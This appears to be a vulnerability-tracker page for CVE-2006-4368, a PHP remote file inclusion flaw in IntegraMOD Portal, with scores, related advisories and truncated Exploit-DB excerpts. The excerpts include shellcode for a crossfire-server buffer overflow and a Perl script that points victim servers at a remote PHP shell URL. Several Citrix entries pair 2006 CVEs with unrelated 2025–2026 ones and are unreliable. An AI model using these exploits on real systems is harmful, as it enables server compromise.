CVE-2006-4368
published 2006-08-26CVE-2006-4368: PHP remote file inclusion vulnerability in includes/functions_portal.php in IntegraMOD Portal 2.x and earlier allows remote attackers to execute arbitrary PHP…
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.23%
86.7th percentile
PHP remote file inclusion vulnerability in includes/functions_portal.php in IntegraMOD Portal 2.x and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| integramod | integramod_portal | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2563-9f8c-7cw3: PHP remote file inclusion vulnerability in includes/functions_portal
ghsa_unreviewed·2022-05-01
CVE-2006-4368 [HIGH] GHSA-2563-9f8c-7cw3: PHP remote file inclusion vulnerability in includes/functions_portal
PHP remote file inclusion vulnerability in includes/functions_portal.php in IntegraMOD Portal 2.x and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
Citrix
Citrix Security Bulletin CTX111695
vendor_citrix·CVSS 6.0
CVE-2006-6573 [MEDIUM] Citrix Security Bulletin CTX111695
Citrix Security Bulletin CTX111695
CVE References: CVE-2006-6573, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
Citrix
Citrix Security Bulletin CTX110492
vendor_citrix·CVSS 6.5
CVE-2006-3779 [MEDIUM] Citrix Security Bulletin CTX110492
Citrix Security Bulletin CTX110492
CVE References: CVE-2006-3779, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
Citrix
Citrix Security Bulletin CTX111615
vendor_citrix·CVSS 6.5
CVE-2006-6572 [MEDIUM] Citrix Security Bulletin CTX111615
Citrix Security Bulletin CTX111615
CVE References: CVE-2006-6572, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
Citrix
Citrix Security Bulletin CTX111614
vendor_citrix·CVSS 6.5
CVE-2006-6572 [MEDIUM] Citrix Security Bulletin CTX111614
Citrix Security Bulletin CTX111614
CVE References: CVE-2006-6572, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
Citrix
Citrix Security Bulletin CTX111186
vendor_citrix·CVSS 7.5
CVE-2006-5821 [HIGH] Citrix Security Bulletin CTX111186
Citrix Security Bulletin CTX111186
CVE References: CVE-2006-5821, CVE-2006-5861, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
Citrix
Citrix Security Bulletin CTX111827
vendor_citrix·CVSS 6.8
CVE-2006-6334 [MEDIUM] Citrix Security Bulletin CTX111827
Citrix Security Bulletin CTX111827
CVE References: CVE-2006-6334, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
Citrix
Citrix Security Bulletin CTX110439
vendor_citrix·CVSS 5.1
CVE-2006-4846 [MEDIUM] Citrix Security Bulletin CTX110439
Citrix Security Bulletin CTX110439
CVE References: CVE-2006-4846, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
No detection rules found.
Exploit-DB
crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
exploitdb·2021-08-18·CVSS 7.5
CVE-2006-1236 [HIGH] crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
---
# Exploit Title: crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
# Exploit Author: Khaled Salem @Khaled0x07
# Software Link: https://www.exploit-db.com/apps/43240af83a4414d2dcc19fff3af31a63-crossfire-1.9.0.tar.gz
# Version: 1.9.0
# Tested on: Kali Linux 2020.4
# CVE : CVE-2006-1236
#!/bin/python
import socket
import time
# Crash at 4379
# EIP Offset at 4368
# Badchar \x00\x20
# ECX Size 170
# CALL ECX 0x080640eb
size = 4379
# Attacker IP: 127.0.0.1 Port: 443
shellcode = b""
shellcode += b"\xd9\xee\xd9\x74\x24\xf4\xb8\x60\x61\x5f\x28"
shellcode += b"\x5b\x33\xc9\xb1\x12\x31\x43\x17\x03\x43\x17"
shellcode += b"\x83\xa3\x65\xbd\xdd\x12\xbd\xb6\xfd\x07\x02"
shellcode += b"\x6a\x68\xa5\x0d\x6d\xdc\xcf\xc0\xee\x8e\x56
Exploit-DB
Integramod Portal 2.x - 'functions_portal.php' Remote File Inclusion
exploitdb·2006-08-23
CVE-2006-4369 Integramod Portal 2.x - 'functions_portal.php' Remote File Inclusion
Integramod Portal 2.x - 'functions_portal.php' Remote File Inclusion
---
#!/usr/bin/perl
# Method found and exploit scripted by nukedx
# Contacts> ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: [email protected]
# Original advisory can be found at: http://www.nukedx.com/?viewdoc=47
#
# Integramod Portal
#
#
#
# Copyright 2006 (C) nukedx
#
# Greetz to: WW,xT,php from my team NWPX , str0ke , cha0s , Preddy , Yns , |SaMaN|, Caesar , Ogre and all of my friends
use IO::Socket;
# Default configuration
$shell = "http://hometown.aol.com/yarivgiladi/sh.php";
# Checking user settings
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-43\r\n";
print "- Integramod Portal \r\n";
print "- -> Victim's host ex: www.victim.com\r\n";
print "- -> Pat
No writeups or analysis indexed.
http://marc.info/?l=full-disclosure&m=115641052418714&w=2http://www.nukedx.com/?viewdoc=47http://www.securityfocus.com/archive/1/444207/100/0/threadedhttp://www.securityfocus.com/bid/19689https://exchange.xforce.ibmcloud.com/vulnerabilities/28547https://www.exploit-db.com/exploits/2250http://marc.info/?l=full-disclosure&m=115641052418714&w=2http://www.nukedx.com/?viewdoc=47http://www.securityfocus.com/archive/1/444207/100/0/threadedhttp://www.securityfocus.com/bid/19689https://exchange.xforce.ibmcloud.com/vulnerabilities/28547https://www.exploit-db.com/exploits/2250
2006-08-26
Published